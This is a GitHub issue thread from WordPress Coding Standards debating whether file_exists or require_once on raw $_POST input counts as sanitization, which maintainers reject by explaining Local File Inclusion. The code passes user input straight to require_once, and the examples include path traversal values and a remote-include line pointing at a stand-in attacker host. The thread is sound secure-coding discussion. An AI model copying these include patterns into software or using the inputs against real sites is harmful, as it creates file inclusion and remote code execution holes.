### ISSUE TITLE
Calling file_exists should count as sanitized input

### ISSUE THREAD

**Issue by kkmuffme** [WordPress/WordPress-Coding-Standards#2017]
```
if ( !empty( $_POST['hello'] ) && file_exists( $_POST['hello'] ) ) {
    $hello = $_POST['hello'];
}
```

Atm it's reported as `WordPress.Security.ValidatedSanitizedInput`

Same for is_file, is_dir, is_link

EDIT:
same also for:

```
require_once( $_POST['hello'] );
require_once( $_POST['hello'] . '/world.php' );
require_once( '/foo/' . $_POST['hello'] . '/world.php' );
```
 and the same for `require`, `include` and `include_once` too, since there is no attack vector a "regular" sanitization with sanitize_text_field would solve/improve security.

**Comment by jrfnl** [comment]
@kkmuffme Maybe we have different ideas of sanitization, but this code sample - to me - is a clear security risk....

**Comment by dingo-d** [comment]
How is checking if file exists a valid sanitization? 🤔

**Comment by kkmuffme** [comment]
Thanks for the quick feedback. 

>to me - is a clear security risk....

Could you please explain the attack vector you have in mind?

The only one I can think of:
You would have to have a file on your server that has an SQL injection as file name.
Since we don't create files willy nilly, but sanitize names before creating them, this won't be an issue.

**Comment by jrfnl** [comment]
> Could you please explain the attack vector you have in mind?

Well, a file name is generally later used to include or read the file. While the above code doesn't do that, it does assign the unsanitized value to a variable which will not be flagged anymore as unsanitized.
So any variations of the below would be accepted and could then end up being included and/or displayed:
```
.env
wp-config.php.bak
../../../.htpasswd
site.sql

... etc
```

**Comment by kkmuffme** [comment]
Correct, but this is not what `WordPress.Security.ValidatedSanitizedInput` checks/reports for currently either.

Using `sanitize_text_field( wp_unslash( $_POST['hello'] ) )` will give you exactly the same thing, as my code with file_exists.

Using your example:
```
// $_POST['hello'] = '../../../.htpasswd'
echo sanitize_text_field( wp_unslash( $_POST['hello'] ) );
```

you will also get:

```
.env
wp-config.php.bak
../../../.htpasswd
site.sql
... etc
```

**Comment by swissspidy** [comment]
That's because `WordPress.Security.ValidatedSanitizedInput` does not know whether your `$_POST['hello']` variable is supposed to be a file path or something else.

When dealing with file paths like in your examples I highly recommend using `sanitize_file_name()` and `validate_file()`. Everything else is a potential security risk.

When you use those functions, `WordPress.Security.ValidatedSanitizedInput` will recognize them and treat your input as sanitized. As you can see from this list:

https://github.com/WordPress/WordPress-Coding-Standards/blob/9e89040631985ec1493e6efb551c75e0383edf6c/WordPress/Sniff.php#L180-L234

**Comment by kkmuffme** [comment]
1)
>That's because WordPress.Security.ValidatedSanitizedInput does not know whether your $_POST['hello'] variable is supposed to be a file path or something else.

That's a great idea to extend it though: store the type that is validated (e.g. text, filename, url) and report an error if it's used for something else (e.g. if I use something I sanitized as text field in e.g. touch(), file_get_contents(),...)

b) this also leads to another suggestion from your text: only allow `sanitize_file_name()` or `validate_file()` on `$_FILES` superglobal

2) 
>Everything else is a potential security risk.

True, when we CREATE new files. Not true, when we check EXISTING files.

e.g. there is no risk here whatsoever (and this should not be reported):

```
require_once( $_POST['hello'] );
require_once( $_POST['hello'] . '/world.php' );
require_once( '/foo/' . $_POST['hello'] . '/world.php' );
// same with require/include/include_once
```

In a similar vein, let's take a look at my original suggestion too:

```
if ( !empty( $_POST['hello'] ) && file_exists( $_POST['hello'] ) ) {
    $hello = $_POST['hello'];
}
``` 

a) if file exists returns true, we know that the file exists.
b) we also know, that if a file exists, it has been created with a sanitized name (e.g. via `sanitize_file_name()`)

Therefore, we know that if a variable which contains a file path which exists, is sanitized.
Therefore file_exists is a sufficient check for sanitization, no matter for what the variable is used (since sanitize file name is at least as strict as other sanitize functions like sanitize name or url sanitizing)

I'd appreciate if you point out any attack vectors you guys see. Since currently I only see dogmatic replies without actually examining the issue.

**Comment by swissspidy** [comment]
> we also know, that if a file exists, it has been created with a sanitized name (e.g. via `sanitize_file_name()`)

That is not true. `$_POST['hello'] = '../../../.htpasswd'; file_exists( $_POST['hello'] )` would also return `true`, but clearly the input has not been sanitized.

Doing something like `require_once( $_POST['hello'] )` without proper input sanitization allows an attacker to include arbitrary files on your server. Such a vulnerability is called Local File Inclusion and is often just the starting point of a malicious attack.

Articles like https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1 might explain it a bit better.

Aside: If the `allow_url_include` PHP setting is on, this would even allow including arbitrary files _from a remote server_!

```php
$_POST['hello'] = 'http://some-attacker-website/path/to/malicious/file';
require_once( $_POST['hello'] )
```

That is clearly a security risk.

**Comment by kkmuffme** [comment]
You're right (directories/is_dir would be safe though?)

Local file inclusion: valid point.

Should I open a separate ticket for the suggestion of:
only allow sanitize_file_name() or validate_file() on $_FILES superglobal
